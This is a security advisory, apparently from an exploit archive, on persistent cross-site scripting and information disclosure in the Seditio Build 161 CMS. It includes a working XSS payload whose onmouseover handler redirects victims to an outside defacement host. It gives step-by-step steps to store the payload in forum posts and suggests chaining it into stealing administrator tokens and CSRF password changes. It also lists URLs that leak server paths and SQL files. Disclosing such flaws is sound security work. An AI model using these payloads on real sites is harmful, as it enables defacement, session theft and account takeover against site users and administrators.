Seditio Build 161 Cross Site Scripting / Information Disclosure

Seditio Build 161 Cross Site Scripting / Information Disclosure: Posted Mar 29, 2012; Authored by Akastep; Seditio Build 161 suffers from cross site scripting and information disclosure vulnerabilities.; tags | exploit, vulnerability, xss, info disclosure; SHA-256 | 24d00df977e36031d477611c3c82dacf901cc57e002426b7b8ff69be83dee52c; Download | Favorite | View

Seditio Build 161 Cross Site Scripting / Information Disclosure

==========================================================
Vulnerable Software: seditio-build161
==========================================================
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl

# md5sum sed*.rar
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar

Installation:Standart (i assume with default settings)

Tested:
==========================================================
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
==========================================================
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:
==========================================================
Exploitation:
Create new topic(/forums.php?m=newtopic&s=1)
using the following details:

Topic Title: Whatever you want.
Topic Description: Whatever you want.
Body:
Inject this: 
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>

Post the topic.

Then you'll see it as plaintext for first time.
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.
After update you'll return to your post.Try to over your mouse over the link.

Same rules and exploitation also applies to *Reply* section.
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.
@Print screen on success pwn:
http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png

Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using 
document.body.innerHTML(to steal administrator tokens)
==========================================================
Ok now about Info And Path Disclosure:
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)

http://192.168.0.15/learn/9/seditio/view.php

Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21
@http://www.neocrome.net/view.php

http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php

Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37


http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450


http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php


Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37

Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104
==============================================================================================================================
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21

@http://www.neocrome.net/system/core/view/view.inc.php

===============================================================================================================================
Info disclosure:
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql

http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql
IMO Needs at least simply .htaccess rule to protect from eyes this files.
===============================================================================================================================

/AkaStep  ^_^
1332959725

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Seditio Build 161 Cross Site Scripting / Information Disclosure

Seditio Build 161 Cross Site Scripting / Information Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Seditio Build 161 Cross Site Scripting / Information Disclosure

Share This

Seditio Build 161 Cross Site Scripting / Information Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems